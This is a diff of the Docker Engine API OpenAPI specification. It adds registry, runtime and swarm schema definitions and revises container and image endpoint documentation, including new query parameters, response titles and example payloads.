+        description: "Names of available logging-drivers, and logging-driver plugins."
+        type: "array"
+        items:
+          type: "string"
+        example: ["awslogs", "fluentd", "gcplogs", "gelf", "journald", "json-file", "logentries", "splunk", "syslog"]
+
+
+  RegistryServiceConfig:
+    description: |
+      RegistryServiceConfig stores daemon registry services configuration.
+    type: "object"
+    x-nullable: true
+    properties:
+      AllowNondistributableArtifactsCIDRs:
+        description: |
+          List of IP ranges to which nondistributable artifacts can be pushed,
+          using the CIDR syntax [RFC 4632](https://tools.ietf.org/html/4632).
+
+          Some images (for example, Windows base images) contain artifacts
+          whose distribution is restricted by license. When these images are
+          pushed to a registry, restricted artifacts are not included.
+
+          This configuration override this behavior, and enables the daemon to
+          push nondistributable artifacts to all registries whose resolved IP
+          address is within the subnet described by the CIDR syntax.
+
+          This option is useful when pushing images containing
+          nondistributable artifacts to a registry on an air-gapped network so
+          hosts on that network can pull the images without connecting to
+          another server.
+
+          > **Warning**: Nondistributable artifacts typically have restrictions
+          > on how and where they can be distributed and shared. Only use this
+          > feature to push artifacts to private registries and ensure that you
+          > are in compliance with any terms that cover redistributing
+          > nondistributable artifacts.
+
+        type: "array"
+        items:
+          type: "string"
+        example: ["::1/128", "127.0.0.0/8"]
+      AllowNondistributableArtifactsHostnames:
+        description: |
+          List of registry hostnames to which nondistributable artifacts can be
+          pushed, using the format `<hostname>[:<port>]` or `<IP address>[:<port>]`.
+
+          Some images (for example, Windows base images) contain artifacts
+          whose distribution is restricted by license. When these images are
+          pushed to a registry, restricted artifacts are not included.
+
+          This configuration override this behavior for the specified
+          registries.
+
+          This option is useful when pushing images containing
+          nondistributable artifacts to a registry on an air-gapped network so
+          hosts on that network can pull the images without connecting to
+          another server.
+
+          > **Warning**: Nondistributable artifacts typically have restrictions
+          > on how and where they can be distributed and shared. Only use this
+          > feature to push artifacts to private registries and ensure that you
+          > are in compliance with any terms that cover redistributing
+          > nondistributable artifacts.
+        type: "array"
+        items:
+          type: "string"
+        example: ["registry.internal.corp.example.com:3000", "[2001:db8:a0b:12f0::1]:443"]
+      InsecureRegistryCIDRs:
+        description: |
+          List of IP ranges of insecure registries, using the CIDR syntax
+          ([RFC 4632](https://tools.ietf.org/html/4632)). Insecure registries
+          accept un-encrypted (HTTP) and/or untrusted (HTTPS with certificates
+          from unknown CAs) communication.
+
+          By default, local registries (`127.0.0.0/8`) are configured as
+          insecure. All other registries are secure. Communicating with an
+          insecure registry is not possible if the daemon assumes that registry
+          is secure.
+
+          This configuration override this behavior, insecure communication with
+          registries whose resolved IP address is within the subnet described by
+          the CIDR syntax.
+
+          Registries can also be marked insecure by hostname. Those registries
+          are listed under `IndexConfigs` and have their `Secure` field set to
+          `false`.
+
+          > **Warning**: Using this option can be useful when running a local
+          > registry, but introduces security vulnerabilities. This option
+          > should therefore ONLY be used for testing purposes. For increased
+          > security, users should add their CA to their system's list of trusted
+          > CAs instead of enabling this option.
+        type: "array"
+        items:
+          type: "string"
+        example: ["::1/128", "127.0.0.0/8"]
+      IndexConfigs:
+        type: "object"
+        additionalProperties:
+          $ref: "#/definitions/IndexInfo"
+        example:
+          "127.0.0.1:5000":
+            "Name": "127.0.0.1:5000"
+            "Mirrors": []
+            "Secure": false
+            "Official": false
+          "[2001:db8:a0b:12f0::1]:80":
+            "Name": "[2001:db8:a0b:12f0::1]:80"
+            "Mirrors": []
+            "Secure": false
+            "Official": false
+          "docker.io":
+            Name: "docker.io"
+            Mirrors: ["https://hub-mirror.corp.example.com:5000/"]
+            Secure: true
+            Official: true
+          "registry.internal.corp.example.com:3000":
+            Name: "registry.internal.corp.example.com:3000"
+            Mirrors: []
+            Secure: false
+            Official: false
+      Mirrors:
+        description: |
+          List of registry URLs that act as a mirror for the official
+          (`docker.io`) registry.
+
+        type: "array"
+        items:
+          type: "string"
+        example:
+          - "https://hub-mirror.corp.example.com:5000/"
+          - "https://[2001:db8:a0b:12f0::1]/"
+
+  IndexInfo:
+    description:
+      IndexInfo contains information about a registry.
+    type: "object"
+    x-nullable: true
+    properties:
+      Name:
+        description: |
+          Name of the registry, such as "docker.io".
+        type: "string"
+        example: "docker.io"
+      Mirrors:
+        description: |
+          List of mirrors, expressed as URIs.
+        type: "array"
+        items:
+          type: "string"
+        example:
+          - "https://hub-mirror.corp.example.com:5000/"
+          - "https://registry-2.docker.io/"
+          - "https://registry-3.docker.io/"
+      Secure:
+        description: |
+          Indicates if the registry is part of the list of insecure
+          registries.
+
+          If `false`, the registry is insecure. Insecure registries accept
+          un-encrypted (HTTP) and/or untrusted (HTTPS with certificates from
+          unknown CAs) communication.
+
+          > **Warning**: Insecure registries can be useful when running a local
+          > registry. However, because its use creates security vulnerabilities
+          > it should ONLY be enabled for testing purposes. For increased
+          > security, users should add their CA to their system's list of
+          > trusted CAs instead of enabling this option.
+        type: "boolean"
+        example: true
+      Official:
+        description: |
+          Indicates whether this is an official registry (i.e., Docker Hub / docker.io)
+        type: "boolean"
+        example: true
+
+  Runtime:
+    description: |
+      Runtime describes an [OCI compliant](https://github.com/opencontainers/runtime-spec)
+      runtime.
+
+      The runtime is invoked by the daemon via the `containerd` daemon. OCI
+      runtimes act as an interface to the Linux kernel namespaces, cgroups,
+      and SELinux.
+    type: "object"
+    properties:
+      path:
+        description: |
+          Name and, optional, path, of the OCI executable binary.
+
+          If the path is omitted, the daemon searches the host's `$PATH` for the
+          binary and uses the first result.
+        type: "string"
+        example: "/usr/local/bin/my-oci-runtime"
+      runtimeArgs:
+        description: |
+          List of command-line arguments to pass to the runtime when invoked.
+        type: "array"
+        x-nullable: true
+        items:
+          type: "string"
+        example: ["--debug", "--systemd-cgroup=false"]
+
+  Commit:
+    description: |
+      Commit holds the Git-commit (SHA1) that a binary was built from, as
+      reported in the version-string of external tools, such as `containerd`,
+      or `runC`.
+    type: "object"
+    properties:
+      ID:
+        description: "Actual commit ID of external tool."
+        type: "string"
+        example: "cfb82a876ecc11b5ca0977d1733adbe58599088a"
+      Expected:
+        description: |
+          Commit ID of external tool expected by dockerd as set at build time.
+        type: "string"
+        example: "2d41c047c83e09a6d61d464906feb2a2f3c52aa4"
+
+  SwarmInfo:
+    description: |
+      Represents generic information about swarm.
+    type: "object"
+    properties:
+      NodeID:
+        description: "Unique identifier of for this node in the swarm."
+        type: "string"
+        default: ""
+        example: "k67qz4598weg5unwwffg6z1m1"
+      NodeAddr:
+        description: |
+          IP address at which this node can be reached by other nodes in the
+          swarm.
+        type: "string"
+        default: ""
+        example: "10.0.0.46"
+      LocalNodeState:
+        $ref: "#/definitions/LocalNodeState"
+      ControlAvailable:
+        type: "boolean"
+        default: false
+        example: true
+      Error:
+        type: "string"
+        default: ""
+      RemoteManagers:
+        description: |
+          List of ID's and addresses of other managers in the swarm.
+        type: "array"
+        default: null
+        x-nullable: true
+        items:
+          $ref: "#/definitions/PeerNode"
+        example:
+          - NodeID: "71izy0goik036k48jg985xnds"
+            Addr: "10.0.0.158:2377"
+          - NodeID: "79y6h1o4gv8n120drcprv5nmc"
+            Addr: "10.0.0.159:2377"
+          - NodeID: "k67qz4598weg5unwwffg6z1m1"
+            Addr: "10.0.0.46:2377"
+      Nodes:
+        description: "Total number of nodes in the swarm."
+        type: "integer"
+        x-nullable: true
+        example: 4
+      Managers:
+        description: "Total number of managers in the swarm."
+        type: "integer"
+        x-nullable: true
+        example: 3
+      Cluster:
+        $ref: "#/definitions/ClusterInfo"
+
+  LocalNodeState:
+    description: "Current local status of this node."
+    type: "string"
+    default: ""
+    enum:
+      - ""
+      - "inactive"
+      - "pending"
+      - "active"
+      - "error"
+      - "locked"
+    example: "active"
+
+  PeerNode:
+    description: "Represents a peer-node in the swarm"
+    properties:
+      NodeID:
+        description: "Unique identifier of for this node in the swarm."
+        type: "string"
+      Addr:
+        description: |
+          IP address and ports at which this node can be reached.
+        type: "string"
+
+paths:
+  /containers/json:
+    get:
+      summary: "List containers"
+      description: |
+        Returns a list of containers. For details on the format, see [the inspect endpoint](#operation/ContainerInspect).
+
+        Note that it uses a different, smaller representation of a container than inspecting a single container. For example,
+        the list of linked containers is not propagated .
+      operationId: "ContainerList"
+      produces:
+        - "application/json"
+      parameters:
+        - name: "all"
+          in: "query"
+          description: "Return all containers. By default, only running containers are shown"
+          type: "boolean"
+          default: false
+        - name: "limit"
+          in: "query"
+          description: "Return this number of most recently created containers, including non-running ones."
+          type: "integer"
+        - name: "size"
+          in: "query"
+          description: "Return the size of container as fields `SizeRw` and `SizeRootFs`."
+          type: "boolean"
+          default: false
+        - name: "filters"
+          in: "query"
+          description: |
+            Filters to process on the container list, encoded as JSON (a `map[string][]string`). For example, `{"status": ["paused"]}` will only return paused containers. Available filters:
+
+            - `ancestor`=(`<image-name>[:<tag>]`, `<image id>`, or `<image@digest>`)
+            - `before`=(`<container id>` or `<container name>`)
+            - `expose`=(`<port>[/<proto>]`|`<startport-endport>/[<proto>]`)
+            - `exited=<int>` containers with exit code of `<int>`
+            - `health`=(`starting`|`healthy`|`unhealthy`|`none`)
+            - `id=<ID>` a container's ID
+            - `isolation=`(`default`|`process`|`hyperv`) (Windows daemon only)
+            - `is-task=`(`true`|`false`)
+            - `label=key` or `label="key=value"` of a container label
+            - `name=<name>` a container's name
+            - `network`=(`<network id>` or `<network name>`)
+            - `publish`=(`<port>[/<proto>]`|`<startport-endport>/[<proto>]`)
+            - `since`=(`<container id>` or `<container name>`)
+            - `status=`(`created`|`restarting`|`running`|`removing`|`paused`|`exited`|`dead`)
+            - `volume`=(`<volume name>` or `<mount point destination>`)
+          type: "string"
+      responses:
+        200:
+          description: "no error"
+          schema:
+            $ref: "#/definitions/ContainerSummary"
+          examples:
+            application/json:
+              - Id: "8dfafdbc3a40"
+                Names:
+                  - "/boring_feynman"
+                Image: "ubuntu:latest"
+                ImageID: "d74508fb6632491cea586a1fd7d748dfc5274cd6fdfedee309ecdcbc2bf5cb82"
+                Command: "echo 1"
+                Created: 1367854155
+                State: "Exited"
+                Status: "Exit 0"
+                Ports:
+                  - PrivatePort: 2222
+                    PublicPort: 3333
+                    Type: "tcp"
+                Labels:
+                  com.example.vendor: "Acme"
+                  com.example.license: "GPL"
+                  com.example.version: "1.0"
+                SizeRw: 12288
+                SizeRootFs: 0
+                HostConfig:
+                  NetworkMode: "default"
+                NetworkSettings:
+                  Networks:
+                    bridge:
+                      NetworkID: "7ea29fc1412292a2d7bba362f9253545fecdfa8ce9a6e37dd10ba8bee7129812"
+                      EndpointID: "2cdc4edb1ded3631c81f57966563e5c8525b81121bb3706a9a9a3ae102711f3f"
+                      Gateway: "172.17.0.1"
+                      IPAddress: "172.17.0.2"
+                      IPPrefixLen: 16
+                      IPv6Gateway: ""
+                      GlobalIPv6Address: ""
+                      GlobalIPv6PrefixLen: 0
+                      MacAddress: "02:42:ac:11:00:02"
+                Mounts:
+                  - Name: "fac362...80535"
+                    Source: "/data"
+                    Destination: "/data"
+                    Driver: "local"
+                    Mode: "ro,Z"
+                    RW: false
+                    Propagation: ""
+              - Id: "9cd87474be90"
+                Names:
+                  - "/coolName"
+                Image: "ubuntu:latest"
+                ImageID: "d74508fb6632491cea586a1fd7d748dfc5274cd6fdfedee309ecdcbc2bf5cb82"
+                Command: "echo 222222"
+                Created: 1367854155
+                State: "Exited"
+                Status: "Exit 0"
+                Ports: []
+                Labels: {}
+                SizeRw: 12288
+                SizeRootFs: 0
+                HostConfig:
+                  NetworkMode: "default"
+                NetworkSettings:
+                  Networks:
+                    bridge:
+                      NetworkID: "7ea29fc1412292a2d7bba362f9253545fecdfa8ce9a6e37dd10ba8bee7129812"
+                      EndpointID: "88eaed7b37b38c2a3f0c4bc796494fdf51b270c2d22656412a2ca5d559a64d7a"
+                      Gateway: "172.17.0.1"
+                      IPAddress: "172.17.0.8"
+                      IPPrefixLen: 16
+                      IPv6Gateway: ""
+                      GlobalIPv6Address: ""
+                      GlobalIPv6PrefixLen: 0
+                      MacAddress: "02:42:ac:11:00:08"
+                Mounts: []
+              - Id: "3176a2479c92"
+                Names:
+                  - "/sleepy_dog"
+                Image: "ubuntu:latest"
+                ImageID: "d74508fb6632491cea586a1fd7d748dfc5274cd6fdfedee309ecdcbc2bf5cb82"
+                Command: "echo 3333333333333333"
+                Created: 1367854154
+                State: "Exited"
+                Status: "Exit 0"
+                Ports: []
+                Labels: {}
+                SizeRw: 12288
+                SizeRootFs: 0
+                HostConfig:
+                  NetworkMode: "default"
+                NetworkSettings:
+                  Networks:
+                    bridge:
+                      NetworkID: "7ea29fc1412292a2d7bba362f9253545fecdfa8ce9a6e37dd10ba8bee7129812"
+                      EndpointID: "8b27c041c30326d59cd6e6f510d4f8d1d570a228466f956edf7815508f78e30d"
+                      Gateway: "172.17.0.1"
+                      IPAddress: "172.17.0.6"
+                      IPPrefixLen: 16
+                      IPv6Gateway: ""
+                      GlobalIPv6Address: ""
+                      GlobalIPv6PrefixLen: 0
+                      MacAddress: "02:42:ac:11:00:06"
+                Mounts: []
+              - Id: "4cb07b47f9fb"
+                Names:
+                  - "/running_cat"
+                Image: "ubuntu:latest"
+                ImageID: "d74508fb6632491cea586a1fd7d748dfc5274cd6fdfedee309ecdcbc2bf5cb82"
+                Command: "echo 444444444444444444444444444444444"
                 Created: 1367854152
                 State: "Exited"
                 Status: "Exit 0"
@@ -2631,7 +4437,7 @@ paths:
           description: "Container to create"
           schema:
             allOf:
-              - $ref: "#/definitions/Config"
+              - $ref: "#/definitions/ContainerConfig"
               - type: "object"
                 properties:
                   HostConfig:
@@ -2770,6 +4576,8 @@ paths:
           description: "Container created successfully"
           schema:
             type: "object"
+            title: "ContainerCreateResponse"
+            description: "OK response to ContainerCreate operation"
             required: [Id, Warnings]
             properties:
               Id:
@@ -2797,10 +4605,6 @@ paths:
           examples:
             application/json:
               message: "No such container: c2ada9df5af8"
-        406:
-          description: "impossible to attach"
-          schema:
-            $ref: "#/definitions/ErrorResponse"
         409:
           description: "conflict"
           schema:
@@ -2822,6 +4626,7 @@ paths:
           description: "no error"
           schema:
             type: "object"
+            title: "ContainerInspectResponse"
             properties:
               Id:
                 description: "The ID of the container"
@@ -2842,10 +4647,22 @@ paths:
                 type: "object"
                 properties:
                   Status:
-                    description: "The status of the container. For example, `running` or `exited`."
+                    description: |
+                      The status of the container. For example, `"running"` or `"exited"`.
                     type: "string"
+                    enum: ["created", "running", "paused", "restarting", "removing", "exited", "dead"]
                   Running:
-                    description: "Whether this container is running."
+                    description: |
+                      Whether this container is running.
+
+                      Note that a running container can be _paused_. The `Running` and `Paused`
+                      booleans are not mutually exclusive:
+
+                      When pausing a container (on Linux), the cgroups freezer is used to suspend
+                      all processes in the container. Freezing the process requires the process to
+                      be running. As a result, paused containers are both `Running` _and_ `Paused`.
+
+                      Use the `Status` field instead to determine if a container's state is "running".
                     type: "boolean"
                   Paused:
                     description: "Whether this container is paused."
@@ -2899,11 +4716,15 @@ paths:
               AppArmorProfile:
                 type: "string"
               ExecIDs:
-                type: "string"
+                description: "IDs of exec instances that are running in the container."
+                type: "array"
+                items:
+                  type: "string"
+                x-nullable: true
               HostConfig:
                 $ref: "#/definitions/HostConfig"
               GraphDriver:
-                $ref: "#/definitions/GraphDriver"
+                $ref: "#/definitions/GraphDriverData"
               SizeRw:
                 description: "The size of files that have been created or changed by this container."
                 type: "integer"
@@ -2917,9 +4738,9 @@ paths:
                 items:
                   $ref: "#/definitions/MountPoint"
               Config:
-                $ref: "#/definitions/Config"
+                $ref: "#/definitions/ContainerConfig"
               NetworkSettings:
-                $ref: "#/definitions/NetworkConfig"
+                $ref: "#/definitions/NetworkSettings"
           examples:
             application/json:
               AppArmorProfile: ""
@@ -2956,6 +4777,9 @@ paths:
                 StopTimeout: 10
               Created: "2015-01-06T15:47:31.485331387Z"
               Driver: "devicemapper"
+              ExecIDs:
+                - "b35395de42bc8abd327f9dd65d913b9ba28c74d2f0734eeeae84fa1c616a0fca"
+                - "3fc1232e5cd20c8de182ed81178503dc6437f4e7ef12b52cc5e8de020652f1c4"
               HostConfig:
                 MaximumIOps: 0
                 MaximumIOBps: 0
@@ -3018,8 +4842,6 @@ paths:
                 LinkLocalIPv6Address: ""
                 LinkLocalIPv6PrefixLen: 0
                 SandboxKey: ""
-                SecondaryIPAddresses: null
-                SecondaryIPv6Addresses: null
                 EndpointID: ""
                 Gateway: ""
                 GlobalIPv6Address: ""
@@ -3096,6 +4918,8 @@ paths:
           description: "no error"
           schema:
             type: "object"
+            title: "ContainerTopResponse"
+            description: "OK response to ContainerTop operation"
             properties:
               Titles:
                 description: "The ps column titles"
@@ -3220,6 +5044,11 @@ paths:
           description: "Only return logs since this time, as a UNIX timestamp"
           type: "integer"
           default: 0
+        - name: "until"
+          in: "query"
+          description: "Only return logs before this time, as a UNIX timestamp"
+          type: "integer"
+          default: 0
         - name: "timestamps"
           in: "query"
           description: "Add timestamps to every log line"
@@ -3235,32 +5064,36 @@ paths:
     get:
       summary: "Get changes on a container’s filesystem"
       description: |
-        Returns which files in a container's filesystem have been added, deleted, or modified. The `Kind` of modification can be one of:
+        Returns which files in a container's filesystem have been added, deleted,
+        or modified. The `Kind` of modification can be one of:
 
         - `0`: Modified
         - `1`: Added
         - `2`: Deleted
       operationId: "ContainerChanges"
-      produces:
-        - "application/json"
+      produces: ["application/json"]
       responses:
         200:
-          description: "no error"
+          description: "The list of changes"
           schema:
             type: "array"
             items:
               type: "object"
+              x-go-name: "ContainerChangeResponseItem"
+              title: "ContainerChangeResponseItem"
+              description: "change item in response to ContainerChanges operation"
+              required: [Path, Kind]
               properties:
                 Path:
                   description: "Path to file that has changed"
                   type: "string"
+                  x-nullable: false
                 Kind:
                   description: "Kind of change"
                   type: "integer"
-                  enum:
-                    - 0
-                    - 1
-                    - 2
+                  format: "uint8"
+                  enum: [0, 1, 2]
+                  x-nullable: false
           examples:
             application/json:
               - Path: "/dev"
@@ -3319,12 +5152,18 @@ paths:
     get:
       summary: "Get container stats based on resource usage"
       description: |
-        This endpoint returns a live stream of a container’s resource usage statistics.
+        This endpoint returns a live stream of a container’s resource usage
+        statistics.
 
-        The `precpu_stats` is the CPU statistic of last read, which is used for calculating the CPU usage percentage. It is not the same as the `cpu_stats` field.
+        The `precpu_stats` is the CPU statistic of the *previous* read, and is
+        used to calculate the CPU usage percentage. It is not an exact copy
+        of the `cpu_stats` field.
+
+        If either `precpu_stats.online_cpus` or `cpu_stats.online_cpus` is
+        nil then for compatibility with older daemons the length of the
+        corresponding `cpu_usage.percpu_usage` array should be used.
       operationId: "ContainerStats"
-      produces:
-        - "application/json"
+      produces: ["application/json"]
       responses:
         200:
           description: "no error"
@@ -3401,6 +5240,7 @@ paths:
                   total_usage: 100215355
                   usage_in_kernelmode: 30000000
                 system_cpu_usage: 739306590000000
+                online_cpus: 4
                 throttling_data:
                   periods: 0
                   throttled_periods: 0
@@ -3416,6 +5256,7 @@ paths:
                   total_usage: 100093996
                   usage_in_kernelmode: 30000000
                 system_cpu_usage: 9492140000000
+                online_cpus: 4
                 throttling_data:
                   periods: 0
                   throttled_periods: 0
@@ -3591,6 +5432,13 @@ paths:
           examples:
             application/json:
               message: "No such container: c2ada9df5af8"
+        409:
+          description: "container is not running"
+          schema:
+            $ref: "#/definitions/ErrorResponse"
+          examples:
+            application/json:
+              message: "Container d37cde0fe4ad63c3a7252023b2f9800282894247d145cb5933ddf6e52cc03a28 is not running"
         500:
           description: "server error"
           schema:
@@ -3619,6 +5467,8 @@ paths:
           description: "The container has been updated."
           schema:
             type: "object"
+            title: "ContainerUpdateResponse"
+            description: "OK response to ContainerUpdate operation"
             properties:
               Warnings:
                 type: "array"
@@ -3882,7 +5732,7 @@ paths:
           default: false
         - name: "stream"
           in: "query"
-          description: "Stream attached streams from the the time the request was made onwards"
+          description: "Stream attached streams from the time the request was made onwards"
           type: "boolean"
           default: false
         - name: "stdin"
@@ -3972,12 +5822,21 @@ paths:
           description: "The container has exit."
           schema:
             type: "object"
+            title: "ContainerWaitResponse"
+            description: "OK response to ContainerWait operation"
             required: [StatusCode]
             properties:
               StatusCode:
                 description: "Exit code of the container"
                 type: "integer"
                 x-nullable: false
+              Error:
+                description: "container waiting error, if any"
+                type: "object"
+                properties:
+                  Message:
+                    description: "Details of an error"
+                    type: "string"
         404:
           description: "no such container"
           schema:
@@ -3995,6 +5854,11 @@ paths:
           required: true
           description: "ID or name of the container"
           type: "string"
+        - name: "condition"
+          in: "query"
+          description: "Wait until a container state reaches the given condition, either 'not-running' (default), 'next-exit', or 'removed'."
+          type: "string"
+          default: "not-running"
       tags: ["Container"]
   /containers/{id}:
     delete:
@@ -4014,6 +5878,13 @@ paths:
           examples:
             application/json:
               message: "No such container: c2ada9df5af8"
+        409:
+          description: "conflict"
+          schema:
+            $ref: "#/definitions/ErrorResponse"
+          examples:
+            application/json:
+              message: "You cannot remove a running container: c2ada9df5af8. Stop the container before attempting removal or force remove"
         500:
           description: "server error"
           schema:
@@ -4034,12 +5905,17 @@ paths:
           description: "If the container is running, kill it before removing it."
           type: "boolean"
           default: false
+        - name: "link"
+          in: "query"
+          description: "Remove the specified link associated with the container."
+          type: "boolean"
+          default: false
       tags: ["Container"]
   /containers/{id}/archive:
     head:
       summary: "Get information about files in a container"
       description: "A response header `X-Docker-Container-Path-Stat` is return containing a base64 - encoded JSON object with some filesystem header information about the path."
-      operationId: "ContainerArchiveHead"
+      operationId: "ContainerArchiveInfo"
       responses:
         200:
           description: "no error"
@@ -4083,10 +5959,9 @@ paths:
       tags: ["Container"]
     get:
       summary: "Get an archive of a filesystem resource in a container"
-      description: "Get an tar archive of a resource in the filesystem of container id."
-      operationId: "ContainerGetArchive"
-      produces:
-        - "application/x-tar"
+      description: "Get a tar archive of a resource in the filesystem of container id."
+      operationId: "ContainerArchive"
+      produces: ["application/x-tar"]
       responses:
         200:
           description: "no error"
@@ -4127,10 +6002,8 @@ paths:
     put:
       summary: "Extract an archive of files or folders to a directory in a container"
       description: "Upload a tar archive to be extracted to a path in the filesystem of container id."
-      operationId: "ContainerPutArchive"
-      consumes:
-        - "application/x-tar"
-        - "application/octet-stream"
+      operationId: "PutContainerArchive"
+      consumes: ["application/x-tar", "application/octet-stream"]
       responses:
         200:
           description: "The content was extracted successfully"
@@ -4188,12 +6061,15 @@ paths:
             Filters to process on the prune list, encoded as JSON (a `map[string][]string`).
 
             Available filters:
+            - `until=<timestamp>` Prune containers created before this timestamp. The `<timestamp>` can be Unix timestamps, date formatted timestamps, or Go duration strings (e.g. `10m`, `1h30m`) computed relative to the daemon machine’s time.
+            - `label` (`label=<key>`, `label=<key>=<value>`, `label!=<key>`, or `label!=<key>=<value>`) Prune containers with (or without, in case `label!=...` is used) the specified labels.
           type: "string"
       responses:
         200:
           description: "No error"
           schema:
             type: "object"
+            title: "ContainerPruneResponse"
             properties:
               ContainersDeleted:
                 description: "Container IDs that were deleted"
@@ -4265,14 +6141,13 @@ paths:
         - name: "filters"
           in: "query"
           description: |
-            A JSON encoded value of the filters (a `map[string][]string`) to process on the images list.
+            A JSON encoded value of the filters (a `map[string][]string`) to process on the images list. Available filters:
 
-            Available filters:
+            - `before`=(`<image-name>[:<tag>]`,  `<image id>` or `<image@digest>`)
             - `dangling=true`
             - `label=key` or `label="key=value"` of an image label
-            - `before`=(`<image-name>[:<tag>]`,  `<image id>` or `<image@digest>`)
-            - `since`=(`<image-name>[:<tag>]`,  `<image id>` or `<image@digest>`)
             - `reference`=(`<image-name>[:<tag>]`)
+            - `since`=(`<image-name>[:<tag>]`,  `<image id>` or `<image@digest>`)
           type: "string"
         - name: "digests"
           in: "query"
@@ -4312,6 +6187,10 @@ paths:
           in: "query"
           description: "A name and optional tag to apply to the image in the `name:tag` format. If you omit the tag the default `latest` value is assumed. You can provide several `t` parameters."
           type: "string"
+        - name: "extrahosts"
+          in: "query"
+          description: "Extra hosts to add to /etc/hosts"
+          type: "string"
         - name: "remote"
           in: "query"
           description: "A Git repository URI or HTTP/HTTPS context URI. If the URI points to a single text file, the file’s contents are placed into a file called `Dockerfile` and the image is built from that file. If the URI points to a tarball, the file is downloaded by the daemon and the contents therein used as the context for the build. If the URI points to a tarball and the `dockerfile` parameter is also specified, there must be a file with the corresponding path inside the tarball."
@@ -4370,8 +6249,19 @@ paths:
           type: "integer"
         - name: "buildargs"
           in: "query"
-          description: "JSON map of string pairs for build-time variables. Users pass these values at build-time. Docker uses the buildargs as the environment context for commands run via the `Dockerfile` RUN instruction, or for variable expansion in other `Dockerfile` instructions. This is not meant for passing secret values. [Read more about the buildargs instruction.](https://docs.docker.com/engine/reference/builder/#arg)"
-          type: "integer"
+          description: >
+            JSON map of string pairs for build-time variables. Users pass these values at build-time. Docker
+            uses the buildargs as the environment context for commands run via the `Dockerfile` RUN
+            instruction, or for variable expansion in other `Dockerfile` instructions. This is not meant for
+            passing secret values.
+
+
+            For example, the build arg `FOO=bar` would become `{"FOO":"bar"}` in JSON. This would result in the
+            the query parameter `buildargs={"FOO":"bar"}`. Note that `{"FOO":"bar"}` should be URI component encoded.
+
+
+            [Read more about the buildargs instruction.](https://docs.docker.com/engine/reference/builder/#arg)
+          type: "string"
         - name: "shmsize"
           in: "query"
           description: "Size of `/dev/shm` in bytes. The size must be greater than 0. If omitted the system uses 64MB."
@@ -4395,8 +6285,8 @@ paths:
           in: "header"
           type: "string"
           enum:
-            - "application/tar"
-          default: "application/tar"
+            - "application/x-tar"
+          default: "application/x-tar"
         - name: "X-Registry-Config"
           in: "header"
           description: |
@@ -4419,6 +6309,16 @@ paths:
 
             Only the registry domain name (and port if not the default 443) are required. However, for legacy reasons, the Docker Hub registry must be specified with both a `https://` prefix and a `/v1/` suffix even though Docker will prefer to use the v2 registry API.
           type: "string"
+        - name: "platform"
+          in: "query"
+          description: "Platform in the format os[/arch[/variant]]"
+          type: "string"
+          default: ""
+        - name: "target"
+          in: "query"
+          description: "Target build stage"
+          type: "string"
+          default: ""
       responses:
         200:
           description: "no error"
@@ -4431,6 +6331,28 @@ paths:
           schema:
             $ref: "#/definitions/ErrorResponse"
       tags: ["Image"]
+  /build/prune:
+    post:
+      summary: "Delete builder cache"
+      produces:
+        - "application/json"
+      operationId: "BuildPrune"
+      responses:
+        200:
+          description: "No error"
+          schema:
+            type: "object"
+            title: "BuildPruneResponse"
+            properties:
+              SpaceReclaimed:
+                description: "Disk space reclaimed in bytes"
+                type: "integer"
+                format: "int64"
+        500:
+          description: "Server error"
+          schema:
+            $ref: "#/definitions/ErrorResponse"
+      tags: ["Image"]
   /images/create:
     post:
       summary: "Create an image"
@@ -4479,6 +6401,11 @@ paths:
           in: "header"
           description: "A base64-encoded auth configuration. [See the authentication section for details.](#section/Authentication)"
           type: "string"
+        - name: "platform"
+          in: "query"
+          description: "Platform in the format os[/arch[/variant]]"
+          type: "string"
+          default: ""
       tags: ["Image"]
   /images/{name}/json:
     get:
@@ -4533,6 +6460,7 @@ paths:
               Created: "2015-09-10T08:30:53.26995814Z"
               GraphDriver:
                 Name: "aufs"
+                Data: {}
               RepoDigests:
                 - "localhost:5000/test/busybox/example@sha256:cbbf2f9a99b47fc460d422812b6a5adff7dfee951d8fa2e4a98caa0382cfbdbf"
               RepoTags:
@@ -4591,23 +6519,29 @@ paths:
       summary: "Get the history of an image"
       description: "Return parent layers of an image."
       operationId: "ImageHistory"
-      produces:
-        - "application/json"
+      produces: ["application/json"]
       responses:
         200:
-          description: "No error"
+          description: "List of image layers"
           schema:
             type: "array"
             items:
               type: "object"
+              x-go-name: HistoryResponseItem
+              title: "HistoryResponseItem"
+              description: "individual image layer information in response to ImageHistory operation"
+              required: [Id, Created, CreatedBy, Tags, Size, Comment]
               properties:
                 Id:
                   type: "string"
+                  x-nullable: false
                 Created:
                   type: "integer"
                   format: "int64"
+                  x-nullable: false
                 CreatedBy:
                   type: "string"
+                  x-nullable: false
                 Tags:
                   type: "array"
                   items:
@@ -4615,8 +6549,10 @@ paths:
                 Size:
                   type: "integer"
                   format: "int64"
+                  x-nullable: false
                 Comment:
                   type: "string"
+                  x-nullable: false
           examples:
             application/json:
               - Id: "3db9c44f45209632d6050b35958829c3a2aa256d81b9a7be45b362ff85c54710"
@@ -4738,19 +6674,20 @@ paths:
     delete:
       summary: "Remove an image"
       description: |
-        Remove an image, along with any untagged parent images that were referenced by that image.
+        Remove an image, along with any untagged parent images that were
+        referenced by that image.
 
-        Images can't be removed if they have descendant images, are being used by a running container or are being used by a build.
+        Images can't be removed if they have descendant images, are being
+        used by a running container or are being used by a build.
       operationId: "ImageDelete"
-      produces:
-        - "application/json"
+      produces: ["application/json"]
       responses:
         200:
-          description: "No error"
+          description: "The image was deleted successfully"
           schema:
             type: "array"
             items:
-              $ref: "#/definitions/ImageDeleteResponse"
+              $ref: "#/definitions/ImageDeleteResponseItem"
           examples:
             application/json:
               - Untagged: "3e2f21a89f"
@@ -4799,6 +6736,7 @@ paths:
             type: "array"
             items:
               type: "object"
+              title: "ImageSearchResponseItem"
               properties:
                 description:
                   type: "string"
@@ -4846,9 +6784,9 @@ paths:
           description: |
             A JSON encoded value of the filters (a `map[string][]string`) to process on the images list. Available filters:
 
-            - `stars=<number>`
             - `is-automated=(true|false)`
             - `is-official=(true|false)`
+            - `stars=<number>` Matches images that has at least 'number' stars.
           type: "string"
       tags: ["Image"]
   /images/prune:
@@ -4861,24 +6799,26 @@ paths:
         - name: "filters"
           in: "query"
           description: |
-            Filters to process on the prune list, encoded as JSON (a `map[string][]string`).
+            Filters to process on the prune list, encoded as JSON (a `map[string][]string`). Available filters:
 
-            Available filters:
             - `dangling=<boolean>` When set to `true` (or `1`), prune only
                unused *and* untagged images. When set to `false`
                (or `0`), all unused images are pruned.
